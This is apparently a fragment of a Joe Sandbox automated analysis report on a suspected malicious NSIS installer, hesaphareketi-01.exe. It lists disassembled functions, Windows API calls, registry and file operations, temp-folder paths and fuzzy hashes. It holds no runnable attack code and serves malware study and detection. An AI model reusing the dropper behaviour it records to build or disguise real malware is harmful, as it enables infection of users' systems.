                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-914839935
                                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                      • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                      • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                        • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1791698881-3916222277
                                                                                      • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                      • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                      • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                      • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: E
                                                                                      • API String ID: 2111968516-3568589458
                                                                                      • Opcode ID: f38303699a4018cbe8e6d667181d2715b25c4e985f0fcc16873fdce1186ac8ed
                                                                                      • Instruction ID: ab86da7c5213a9fcb696458d760f743eb2d5a3f98e1a27f5bdcb1ceb928109e6
                                                                                      • Opcode Fuzzy Hash: f38303699a4018cbe8e6d667181d2715b25c4e985f0fcc16873fdce1186ac8ed
                                                                                      • Instruction Fuzzy Hash: F331C430904208EBCF216FA1CE4999E7AB1AF01358F24413BF611B61E1DBBD4956DA6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                                      • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                                                      • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                                      • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj313A.tmp
                                                                                      • API String ID: 2655323295-3203284636
                                                                                      • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                                                      • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                                                      • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                                                      • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Enum
                                                                                      • String ID:
                                                                                      • API String ID: 464197530-0
                                                                                      • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                      • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                                                      • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                      • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405C0C
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically,?,00000000,000000F0), ref: 0040164D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically, xrefs: 00401640
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically
                                                                                      • API String ID: 1892508949-481820323
                                                                                      • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                      • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                                      • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                      • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405C0C
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                      • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405CB4
                                                                                      • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420), ref: 00405CC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3248276644-3404278061
                                                                                      • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                      • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                                      • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                      • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                                      • RegCloseKey.KERNELBASE(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 004061A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                      • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                      • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040587A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                      • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                                      • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                      • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$FreeHandleLoadModule
                                                                                      • String ID:
                                                                                      • API String ID: 2140536961-0
                                                                                      • Opcode ID: 6e6e7f0f1b6bfd2255ba36ef30769f868f8b0a3d5eacdc143ac1427d18367fdb
                                                                                      • Instruction ID: 59c796add972d153f89f3c9847da26c086efaaa3f0626d733024812317f43a11
                                                                                      • Opcode Fuzzy Hash: 6e6e7f0f1b6bfd2255ba36ef30769f868f8b0a3d5eacdc143ac1427d18367fdb
                                                                                      • Instruction Fuzzy Hash: 51114271900209ABDF21AF65CE4C59EBAB0BF04344F54853BF501F62E1DBB98D81DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 004065C5: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420), ref: 004065D0
                                                                                        • Part of subcall function 004065C5: FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                      • lstrlenW.KERNEL32 ref: 00402293
                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0040229E
                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 873f757547937f42a6eb71912f4c96e239b987a47b92837fe142eeb779086f02
                                                                                      • Instruction ID: 7b2fc1264b4fb0dc72f9b007f51c651f6a3d170a065e006ef865ab6f7e8bf7d8
                                                                                      • Opcode Fuzzy Hash: 873f757547937f42a6eb71912f4c96e239b987a47b92837fe142eeb779086f02
                                                                                      • Instruction Fuzzy Hash: D6117C71904308AADB10EFF99E49A9EB7B8AF14354F10457FA405FB2D1E6BCD8408B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                                                      • GetLastError.KERNEL32 ref: 10002A62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                      • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                      • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                      • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                      • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                                      • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                      • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                      • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                      • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                      • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 2831762973-0
                                                                                      • Opcode ID: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                      • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                                      • Opcode Fuzzy Hash: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                      • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                      • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                                      • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                      • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(0001047A,?), ref: 00401587
                                                                                      • ShowWindow.USER32(00010474), ref: 0040159C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: 127fcca6f89a8604d6b4e5a3b07e2e150d46683bc6f97280cfd7514b8c0c2a53
                                                                                      • Instruction ID: 07726e94f459f5b79439a183944d215d14e5e7c392dcdebcc51584dee33f67e3
                                                                                      • Opcode Fuzzy Hash: 127fcca6f89a8604d6b4e5a3b07e2e150d46683bc6f97280cfd7514b8c0c2a53
                                                                                      • Instruction Fuzzy Hash: D1E086377041049FCB15DFA4ED808AE77A6EB44321318047FE502F3690C675AD40CF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                        • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                        • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                                        • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                      • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                                                      • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                      • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
